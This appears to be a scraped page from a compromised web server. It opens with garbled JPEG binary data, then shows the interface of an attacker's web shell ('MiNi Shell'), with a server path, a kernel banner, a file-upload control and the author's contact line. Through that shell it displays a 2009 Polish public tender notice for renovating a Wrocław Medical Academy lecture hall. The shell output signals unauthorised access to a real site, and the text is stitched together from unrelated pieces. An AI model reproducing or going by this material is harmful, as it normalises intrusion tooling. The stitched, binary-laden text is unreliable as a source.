JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090515/150204-N-2009.html

<p class="kh_header"><b>Wrocław: Przebudowa Sali wykładowej wraz z klatką schodową i zapleczem oraz linią kablową zasilającą  budynek Katedry i Kliniki Endokrynologii, Diabetologii i Leczenia Izotopami Akademii Medycznej we Wrocławiu przy ul.Pasteura 4 na audiowizualną salę konferencyjną w oparciu o projekt budowlany, projekt wykonawczy i STWiOR autorstwa- Autorska Pracownia Architektury- Bożena Marszałkiewicz ul. Ostrowskiego 9, 53-238 Wrocław, realizowana w dwóch etapach. Etap 1A- roboty realizowane w 2009 r, Etap 1B- roboty realizowane w 2010 i 2011 r.</b><br>
<b>Numer ogłoszenia: 150204 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Medyczna im. Piastów Śląskich , ul. Pasteura 1, 50-537 Wrocław, woj. dolnośląskie, tel. (071) 784 00 44; 784-11-73, faks (071) 784 00 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa Sali wykładowej wraz z klatką schodową i zapleczem oraz linią kablową zasilającą  budynek Katedry i Kliniki Endokrynologii, Diabetologii i Leczenia Izotopami Akademii Medycznej we Wrocławiu przy ul.Pasteura 4 na audiowizualną salę konferencyjną w oparciu o projekt budowlany, projekt wykonawczy i STWiOR autorstwa- Autorska Pracownia Architektury- Bożena Marszałkiewicz ul. Ostrowskiego 9, 53-238 Wrocław, realizowana w dwóch etapach. Etap 1A- roboty realizowane w 2009 r, Etap 1B- roboty realizowane w 2010 i 2011 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa Sali wykładowej wraz z klatką schodową i zapleczem oraz linią kablową zasilającą  budynek Katedry i Kliniki Endokrynologii, Diabetologii i Leczenia Izotopami Akademii Medycznej we Wrocławiu przy ul. Pasteura 4 na audiowizualną salę konferencyjną w oparciu o projekt budowlany, projekt wykonawczy i STWiOR autorstwa- Autorskiej Pracownia Architektury Bożena Marszałkiewicz ul. Ostrowskiego 9,           53-238 Wrocław, realizowana w dwóch etapach. Etap 1A- roboty realizowane w 2009 r, Etap 1B- roboty realizowane w 2010 i 2011 r.
a. wykonanie wzmocnień ścian konstrukcyjnych poprzez założenie stalowych
                  ściągów wg projektu konstrukcyjnego o łącznej masie 0,330 t
              b. zmiana w  ściankach działowych- nowy układ sanitariatów i zaplecza sali
                   - 163,824 m2
              c. nowa wentylacja mechaniczna i układ schładzania 78 szt.- 2 układy
                  288,784 m2 - 8 m
              d. instalacje wod-kan  134,30 m - 115szt. - 14 kpl.
              e. instalacja c.o.    16 szt.
              f. wymiana stolarki okiennej na drewnianą, zespoloną w kolorze oliwkowym, wg NCS kolor nr S 1010-G50Y, 21 szt. podokienników- 90,63 m2 okien
              g. wymiana drzwi wewnętrznych na drewniane lub p.poż.  19 szt.
              h. zachowanie- renowacja drzwi wejściowych 1 szt.
              i. nowe wykończenie ścian i okladziny podłóg 593,603 m2 ściany 268,446 m2 podłogi - 270,26 m stopni
              j. kapitalny remont dachu nad salą- wymiana izolacji pokrycia tarasu nad stropem 928,09 m2
              k. renowacja elewacji 460,102 m2
              l. malowanie i tapetowanie ścian i sufitów, sufity podwieszane 758,011 m2 -158,272m2
             m. wymiana instalacji oświetlenia 96 kpl.- 17 szt. - 705m
             n. kabel zasilający rozdzielnicę RG wraz  z rozdzielnicą  100m - 1 szt.
             o. instalacja siłowa i gniazd wtyczkowych 108 szt. - 485 m
             p. instalacja połączeń wyrównawczych 1 szt. -80 m
             q. instalacja odgromowa 17 szt. -52 m
             r. wykonanie linii kablowej od trafostacji do budynku, złącze kablowe  82m -1kpl.

     4.    Wykaz poz. Przedmiaru robót dla Etapu 1A .
4.1	WSZ 454 53 000 - 7 Roboty budowlane wraz z wyposażeniem.

.	Od poz. 1 d.1 do poz. 19 d.1
.	Od poz. 20 d. 2 do poz. 37 d. 2
.	Poz. 38 d.3
.	Od poz. 39 d.4 do poz. 44 d. 4
.	Od poz. 45 d.5 do poz. 53 d.5 oraz  od poz. 61 d. 5 do poz. 67 d.5 
            oraz od poz. 69 d.5 do poz. 70 d.5 
.	Od poz. 72 d.6 do poz. 73 d.6
.	Od poz. 75 d.7 do poz. 76 d.7 oraz poz. 78 d.7
.	Od poz. 80 d.8 do poz. 86 d.8
.	Od poz. 99 d. 10 do poz. 105 d.10
.	Od poz. 108 d.12 i poz. 112 d.12
.	Poz. 116 d. 13 ,poz. 118 d.13, poz.119 d.13 ,poz.120 d.13 ,poz.131 d.13,
            poz.134 d.13
.	Poz. 136 d.14 obmiar 150,00 m2, poz. 137 d.14 obmiar 150 m2,poz.138 d.14 obmiar 150,00 m2
.	Od poz. 145 d.15 do poz. 154 d.15
.	Od poz. 175 d.18 i poz. 177 d.18

4.2 WSZ 453 31 100 - 7 Instalacje sanitarne wod.- kan. , c.o., wentylacji .
.	Od poz. 1 d.1 do poz. 83 d.6
.	Poz. 138 d.9 i poz. 139 d.9

      4.3.  WSZ 323 22 000- 8   Urządzenia multimedialne.
.	Poz. 67 d.2 i poz. 68 d.2

4.4. WSZ 453 10 000 - 3  Instalacje i sieci elektryczne .
.	Od poz.1 d.1.1  do poz. 12 d. 1.1
.	Od poz. 13 d.1.2 do poz. 15 d.1.2
.	Od poz. 16 d. 1.3 do poz.17 d.1.3
.	Od poz. 18 d. 2.1 do poz. 19 d. 2.1
.	Od poz. 20  d.2.2 do poz. 24 d.2.2
.	Od poz. 25 d. 2.3 do poz. 27 d. 2.3
.	Od poz. 28 d. 2.4.1 do poz. 29 d.2.4.1 ,poz. 30 d. 2.4.1 obmiar 6 kpl., 
            poz. 37     d. 2.4.1 obmiar 2 kpl
.	Od poz. 39 d.2.4.2 do poz. 45 d.2.4.2
.	Od poz. 47 d. 2.4.3 do poz. 53 d.2.4.3
.	Od poz. 54 d.2.4.4 do poz. 55 d.2.4.4
.	Od poz. 60 d. 2.5.2 do poz. 73 d.2.5.2
.	Od poz. 74 d. 2.6 do poz. 75 d.2.6
.	Od poz. 76 d.2.7 do poz. 77 d.2.7
.	Poz. 78 d.2.8 , poz. 84 d.2.8
Dodatkowo w Przedmiarze robót wprowadzono element scalony PN.  3. Przejścia pod drogami metodą przecisku.
Poz. 87 d.3   Wycena własna 2 kpl  - 6 m i 17 m  

   5.        Wykaz poz. Przedmiaru robót dla Etapu 1B.

     5.1.  WSZ 454 53 000 - 7   Roboty budowlane wraz z wyposażeniem.

.	Od poz. 54 d.5   do   poz. 60 d.5,  poz. 68 d.5 ,  poz.71 d.5
.	Poz. 71 d.6 ,od poz. 71 d.6 do poz. 79 d.6
.	Poz. 77 d.7  i poz. 79 d.7
.	Poz. 87 d.8
.	Od poz. 88 d.9 do poz. 98 d.9
.	Poz. 106 d.11 i poz. 107 d.11
.	Od poz. 109 d.12 do poz. 111 d.12 i poz. 113 d.12, poz.114 d.12
.	Poz. 115 d.13, poz.117 d.13, od poz. 121 d.13 do poz. 130 d.13, od poz. 132 d.13 do poz.1333 d.13 i poz.135 d.13
.	Poz. 136 d.14 obmiar 429,80 m2 ,poz.137 d.14 obmiar 429,80 m2,poz. 138 d.14 obmiar 429,80 m2, od poz. 139 d.14 do poz.144 d.14
.	Od poz. 155 d.16 do poz. 166 d.16
.	Od poz. 167 d.17 do poz. 173 d.17

5.2. WSZ 453 31 100-7  Instalacje sanitarne wod-kan.,c.o.,wentylacji.

.	Od poz. 84 d.7 do poz.107 d.7
.	Od poz. 108 d.8 do poz. 137 d.8
.	Od poz. 140 d.10 do poz. 160 d.10
.	Od poz. 161 d.11 do poz. 172 d.11

5.3. WSZ 323 22 000-8  Urządzenia multimedialne.

                 Nie występują.

5.4	  WSZ 453 10 000-3 Instalacje i sieci elektryczne.

.	Poz. 30 d.2.4.1 obmiar 2 kpl ,od poz. 31 d.2.4.1 do poz. 36 d.2.4.1, poz. 37 d.2.4.1 obmiar 7 kpl., poz. 38 d.2.4.1
.	Poz. 46 d.2.4.2
.	Od 56 d.2.5.1 do 59 d.2.5.1
.	Od poz. 79 d.2.8 do poz. 83 d.2.8 ,od poz.85 d.2.8 do poz.86 d.2.8.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.11.00-1, 45.33.24.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Kwota wadium wynosi 30.000,00 PLN (słownie: trzydzieści tysięcy i 00- 100 PLN
2.  Wadium może być wnoszone w jednej lub kilku następujących formach : 
a	w pieniądzu, przelewem na konto zamawiającego: 

        BZ WBK S.A.  16 O- Wrocław 
        72109024020000000630000428
   b)   w poręczeniach bankowych,
c  gwarancjach  bankowych,
d   gwarancjach ubezpieczeniowych,
e   poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
3. W przypadku wniesienia wadium w jednym ze sposobów wymienionych powyżej w pkt. b-e, należy zaznaczyć w ofercie, czy dokument taki zamawiający ma zwrócić Wykonawcy. 
4.  Wadium wnoszone w innej formie niż w pieniądzu należy złożyć w siedzibie Zespołu ds. Zamówień Publicznych AM we Wrocławiu, ul. Mikulicza - Radeckiego nr 5, 50-368 Wrocław pokój  221, 
przed terminem wyznaczonym do składania ofert za potwierdzeniem złożenia
5.  Kopię potwierdzenia wpłaty wadium  na konto zamawiającego należy załączyć do złożonej oferty.
   Oferty bez dowodu wniesienia wadium nie będą rozpatrywane.  
6.  Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz zamawiającego w przypadku, gdy:
a	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
b	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy terminie wyznaczonym 
w umowie 7 dni po podpisaniu umowy .
c	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
7.  Zwrot wadium nastąpi w trybie przepisu art. 46 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Ocena spełnienia warunków wymaganych od  Oferentów zostanie dokonana wg formuły 
 spełnia - nie spełnia   po sprawdzeniu czy Oferent :
-	  nie podlega  wykluczeniu na podstawie art.24 i art. 22  ustawy Prawo zamówień publicznych -  zał do SIWZ
-	jest uprawniony do występowania w obrocie prawnym, zgodnie z wymogami ustawowymi
   i prowadzi działalność w branży budowlanej i elektrycznej
-	posiada  pracowników z uprawnieniami  budowlanymi, elektrycznymi i sanitarnymi zgodnie z  przepisami prawa budowlanego, zapewni kierownika robót                                                                     z uprawnieniami i doświadczeniem zawodowym  w branży budowlanej , elektrycznej i sanitarnej- zał do SIWZ
-posiada Polisę OC od  odpowiedzialności cywilnej  zgodnie z rozporządzeniem Ministra Finansów  z dnia 17.04.2002 r obowiązkowego dla grupy zawodowej  architektów  i  budownictwa,  na podstawie   której regulowane będą należności  za wyrządzone  szkody  do kwoty  50.000,00 EURO. 
-	  posiada potencjał finansowy pozwalający na realizację zamówienia przy założeniu iż zapłata     za wykonane  zlecenie,  może być dokonana  po odbiorze końcowym.  
-   udzieli  co najmniej   5  letniej gwarancji  na  wykonane  roboty budowlane, elektryczne i sanitarne a na użyte materiały gwarancji producenta
-   wykaże, że wykonał min  3 podobne zlecenia  w ciągu ostatnich 5 lat, 
-   załączy podpisany projekt umowy - zał do SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie oferenta, że: nie podlega wykluczeniu   z  postępowania na podstawie art. 24 oraz ,  że spełnia wymagania  określone w art. 22    - wzór oświadczenia  - załącznik     do SIWZ
-. Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
-  Zaświadczenie,  że oferent nie zalega   z płatnościami w ZUS i US  lub, że uzyskał zgodę na zwolnienie, odroczenie  lub rozłożenie płatności na raty, wystawione nie wcześniej niż  3 miesięcy  przed terminem składania ofert. 
- Aktualnej informacji z Krajowego rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt.9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert o udzielenie zamówienia publicznego.
- Wykaz  wykonanych robot budowlanych ( remont, modernizacja, budowa) w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością  ( min. 1500. 000,00 PLN każda) robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsc wykonania oraz załączeniem dokumentów potwierdzających, ze roboty te zostały wykonane należycie.
-    Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową  do 1.500.000, 00 PLN wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
 - Imienne przedstawienie kierownika robót  z uprawnieniami do  nadzorowania  robót budowlanych, elektrycznych i sanitarnych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.am.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół ds. Zamówień Publicznych Akademii Medycznej we Wrocławiu przy ul. Mikulicza-Radeckiego 5, pok. 221.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 10:00, miejsce: Zespół ds. Zamówień Publicznych Akademii Medycznej we Wrocławiu przy ul. Mikulicza-Radeckiego 5, pok.221.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com